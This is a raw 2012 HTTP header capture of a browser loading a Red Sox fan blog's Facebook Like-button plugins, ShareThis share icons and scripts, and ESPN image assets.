X-FB-Debug: YPN66BDz+F4e2dhiNVTsjqzTGcNFpmVgIN+REVS1/fw=
Date: Mon, 05 Nov 2012 17:00:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df2cf4765f60f78a%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F25%2Fgetting-their-freak-on%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df2cf4765f60f78a%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F25%2Fgetting-their-freak-on%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: smOltwGk33y7nvCLWE9wZZn2wdBsNJyrcusw13w38Sg=
Date: Mon, 05 Nov 2012 17:00:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /images/spinner.gif HTTP/1.1

Host: edge.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.63ea568555d3d23c14e63b0226e3adda.html
Cookie: __uset=yes; __stid=CsFej1CX8Le4CAQ61FPIAg==
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx/1.0.15
Content-Length: 792
Accept-Ranges: bytes
Cache-Control: max-age=11671
Expires: Mon, 05 Nov 2012 20:15:13 GMT
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
GET /share4x/js/st.ceabd4748ab50136cc983839225f512a.js HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.63ea568555d3d23c14e63b0226e3adda.html
Cookie: __uset=yes; __stid=CsFej1CX8Le4CAQ61FPIAg==
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx/0.8.53
Expires: Tue, 05 Nov 2013 16:42:22 GMT
Cache-Control: max-age=31536000
Content-Encoding: gzip
Content-Length: 20943
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df22401eed21fe0e%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F22%2Fjosh-hamilton-at-dh%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df22401eed21fe0e%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F22%2Fjosh-hamilton-at-dh%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: n3MJicPaDc0UJEoh2ay/ePjoK7q71KXvz8WRPbJ2ns0=
Date: Mon, 05 Nov 2012 17:00:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Dfa5f47751f6106%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F22%2Fpoll-your-thoughts-on-farrells-hiring%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Dfa5f47751f6106%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F22%2Fpoll-your-thoughts-on-farrells-hiring%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: NUbIxLqtTJaR9d4hu6Dh5hOcqIDisIxrhJpyHHUORKM=
Date: Mon, 05 Nov 2012 17:00:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /images/sharethis_16.png HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://w.sharethis.com/button/css/buttons.f48d075cabb93f026d23cf2c20db30d0.css
Cookie: __uset=yes; __stid=CsFej1CX8Le4CAQ61FPIAg==
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx/1.0.15
Content-Length: 689
Expires: Tue, 05 Nov 2013 16:41:10 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
GET /images/email_16.png HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://w.sharethis.com/button/css/buttons.f48d075cabb93f026d23cf2c20db30d0.css
Cookie: __uset=yes; __stid=CsFej1CX8Le4CAQ61FPIAg==
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx/0.8.53
Content-Length: 608
Expires: Tue, 05 Nov 2013 16:21:44 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df12b9cbb531f65a%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F21%2Fwelcome-back-john-farrell%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df12b9cbb531f65a%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F21%2Fwelcome-back-john-farrell%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: 1COgkYbUcbITuXQ4ZoQXcapv79MdsqYhoUh9WaHbpK0=
Date: Mon, 05 Nov 2012 17:00:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df3e496d6476ec12%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F24%2Fbobby-v-opens-his-mouth-again%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df3e496d6476ec12%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F24%2Fbobby-v-opens-his-mouth-again%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: 11CSayLDzzBVuvcxK770GVCfYkMjIGUQoKCv1HVufxk=
Date: Mon, 05 Nov 2012 17:00:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df1ce34d53840c64%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F23%2Fplaying-the-gm-part-3-the-free-agent-catchers%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df1ce34d53840c64%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F23%2Fplaying-the-gm-part-3-the-free-agent-catchers%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: NyE2u59OB/TW81bJ2sqmsOZOasPU1+W2WNRJ38f7sjU=
Date: Mon, 05 Nov 2012 17:00:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df2b95c037dcc7aa%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F21%2Fjohn-farrell-is-new-red-sox-manager%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df2b95c037dcc7aa%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F21%2Fjohn-farrell-is-new-red-sox-manager%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: jUbr3w7resYWmLbBvrXJblVXOCCAALx1Y7iSQ6EeVAg=
Date: Mon, 05 Nov 2012 17:00:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df3a9b2510d585a2%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F19%2Fpoll-narrowing-the-candidates%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df3a9b2510d585a2%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F19%2Fpoll-narrowing-the-candidates%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: dHEH7XtlvRKtmL6806ctqGRpRsgX6zV9+GPIegpDl5Q=
Date: Mon, 05 Nov 2012 17:00:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Dff02d56900631%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F20%2Feasy-there%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Dff02d56900631%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F20%2Feasy-there%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: EBTOJhgjJUxFv2BFeysE2tmyk0AuTxxnMNEfjmMEnrQ=
Date: Mon, 05 Nov 2012 17:00:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /images/twitter_16.png HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://w.sharethis.com/button/css/buttons.f48d075cabb93f026d23cf2c20db30d0.css
Cookie: __uset=yes; __stid=CsFej1CX8Le4CAQ61FPIAg==
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx/1.0.15
Content-Length: 1446
Expires: Tue, 05 Nov 2013 16:49:26 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
GET /images/facebook_16.png HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://w.sharethis.com/button/css/buttons.f48d075cabb93f026d23cf2c20db30d0.css
Cookie: __uset=yes; __stid=CsFej1CX8Le4CAQ61FPIAg==
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx/0.8.53
Content-Length: 502
Expires: Tue, 05 Nov 2013 16:42:24 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df3eabd62b5fc1c8%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F19%2Fshould-the-red-sox-give-ortiz-a-multi-year-deal%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df3eabd62b5fc1c8%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F19%2Fshould-the-red-sox-give-ortiz-a-multi-year-deal%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: Db3R+4EHkx7++8fQYffjlmmJm7SSJ6uyxfsVIgaQVSc=
Date: Mon, 05 Nov 2012 17:00:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /i/partners/sweetspot/bgSweetspot_boston.jpg HTTP/1.1

Host: a.espncdn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://espn.go.com/mlb/sweetspot/localMod?site=firebrand
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Wed, 21 Apr 2010 19:57:22 GMT
Content-Length: 4391
Accept-Ranges: bytes
P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
Cache-Control: max-age=1117433
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
GET /prod/assets/bg_espn_generic_optimized.jpg HTTP/1.1

Host: a2.espncdn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://a.espncdn.com/combiner/c?v=201003241632&amp;css=base.201003241632.css,modules.201005171156.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Tue, 30 Dec 2008 16:01:27 GMT
Content-Length: 43228
Accept-Ranges: bytes
P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
Cache-Control: max-age=1117692
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
GET /prod/assets/gradient_back.jpg HTTP/1.1

Host: a2.espncdn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://a.espncdn.com/combiner/c?v=201003241632&amp;css=base.201003241632.css,modules.201005171156.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Tue, 30 Dec 2008 16:01:31 GMT
Content-Length: 929
